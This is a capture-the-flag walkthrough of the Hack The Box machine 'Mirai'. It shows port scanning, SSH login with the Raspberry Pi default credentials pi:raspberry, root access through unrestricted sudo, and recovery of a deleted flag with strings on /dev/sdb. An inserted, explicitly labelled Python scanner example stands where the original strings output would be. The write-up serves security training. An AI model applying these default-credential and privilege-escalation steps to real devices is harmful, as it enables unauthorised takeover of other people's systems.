Summary
Mirai is an easy Linux box. Enumerating the web application reveals an admin directory that discloses Pi-hole is in use. The default credentials were used to open an SSH shell. The user pi was able to execute all commands as root, but the original root.txt was lost and a backup was stored on a USB stick. That backup was also deleted from the USB stick and has to be recovered by analysing the disk itself.
Discovery
Started off by running NmapAutomator.
Nmap discovered the following open ports and services:
PORT STATE SERVICE VERSION
21/tcp open ftp?
22/tcp open ssh OpenSSH 7.2p2
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
25565/tcp open minecraft Minecraft 1.11.2
Navigating to the webserver shows an empty page. Gobuster was used to find directories and files. The following were found:
http://10.129.103.93/admin (Status: 301)
http://10.129.103.93/versions (Status: 200)
Navigating to admin shows this page:
It is running Pi-hole. The default credentials are apparently: pi : raspberry
These could not be used to authenticate to the application but were used to open an SSH shell as pi. The following command was executed:
ssh pi@10.129.104.33
This provided the user.txt.
Privilege Escalation
The permissions for pi were checked:
pi@raspberrypi:~ $ sudo -l
Matching Defaults entries for pi on localhost:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User pi may run the following commands on localhost:
(ALL : ALL) ALL
(ALL) NOPASSWD: ALL
Therefore, you can simply run su -
and start a root shell. However, root.txt did not contain the original flag:
root@raspberrypi:~# cat root.txt
I lost my original root.txt! I think I may have a backup on my USB stick...
OK, so let's check where the USB stick is mounted:
root@raspberrypi:/media/usbstick/lost+found# df -h
Filesystem Size Used Avail Use% Mounted on
aufs 8.5G 2.8G 5.3G 35% /
tmpfs 100M 13M 88M 13% /run
/dev/sda1 1.3G 1.3G 0 100% /lib/live/mount/persistence/sda1
/dev/loop0 1.3G 1.3G 0 100% /lib/live/mount/rootfs/filesystem.squashfs
tmpfs 250M 0 250M 0% /lib/live/mount/overlay
/dev/sda2 8.5G 2.8G 5.3G 35% /lib/live/mount/persistence/sda2
devtmpfs 10M 0 10M 0% /dev
tmpfs 250M 8.0K 250M 1% /dev/shm
tmpfs 5.0M 4.0K 5.0M 1% /run/lock
tmpfs 250M 0 250M 0% /sys/fs/cgroup
tmpfs 250M 8.0K 250M 1% /tmp
/dev/sdb 8.7M 93K 7.9M 2% /media/usbstick
tmpfs 50M 0 50M 0% /run/user/999
tmpfs 50M 0 50M 0% /run/user/1000
So, there's a USB stick mounted at /media/usbstick. Let's investigate that:
pi@raspberrypi:/media/usbstick $ ls
damnit.txt lost+found
pi@raspberrypi:/media/usbstick $ cat damnit.txt
Damnit! Sorry man I accidentally deleted your files off the USB stick.
Do you know if there is any way to get them back?
-James
So, the file seems to have been deleted, and to recover it you will need to analyse the disk itself. For the USB stick this is /dev/sdb.
Let’s run strings against it:
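Scanning the raw device works because deleting a file frees its data blocks without overwriting them, so the bytes stay readable from /dev/sdb until the blocks are reused. The following is an added example, not part of the original writeup and not its missing output: a small Python equivalent of strings that also reports byte offsets, run against a constructed in-memory image. The function names and the sample contents are assumptions made for illustration.

```python
import io
import sys

# Bytes that count as printable, as in strings(1): ASCII 0x20-0x7E plus tab.
PRINTABLE = frozenset(range(0x20, 0x7F)) | {0x09}


def printable_runs(stream, min_len=4, chunk_size=1 << 20):
    """Yield (byte_offset, text) for every run of >= min_len printable bytes.

    The stream is read in chunks so a whole device never sits in memory;
    the run state is kept across reads, so a string that straddles a chunk
    boundary is still reported once, with the offset of its first byte.
    """
    run, start, pos = bytearray(), 0, 0
    while chunk := stream.read(chunk_size):
        for byte in chunk:
            if byte in PRINTABLE:
                if not run:
                    start = pos
                run.append(byte)
            else:
                if len(run) >= min_len:
                    yield start, run.decode("ascii")
                run.clear()
            pos += 1
    if len(run) >= min_len:  # run that reaches the end of the device
        yield start, run.decode("ascii")


def build_sample_image():
    """Constructed 4 KiB image (not data from the box): the deleted file has
    no name left in the image, yet its freed data block still holds its bytes."""
    image = bytearray(4096)
    leftover = b"CONSTRUCTED-CONTENT-OF-DELETED-FILE"
    image[3000:3000 + len(leftover)] = leftover
    image[1024:1034] = b"damnit.txt"  # name of a file that still exists
    return bytes(image)


if __name__ == "__main__":
    # With a path argument, scan that image or device (needs read access);
    # without one, scan the constructed sample.
    src = open(sys.argv[1], "rb") if len(sys.argv) > 1 else io.BytesIO(build_sample_image())
    with src:
        for offset, text in printable_runs(src):
            print(f"{offset:>10}  {text}")
```

The reported offset is what lets an analyst go back to the surrounding blocks of the image and examine the leftover data in context.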
Conclusion
I found this box a little bit less fun; it is probably one of the easier boxes from HTB and I did not learn too much from it. Hope you enjoyed the writeup though!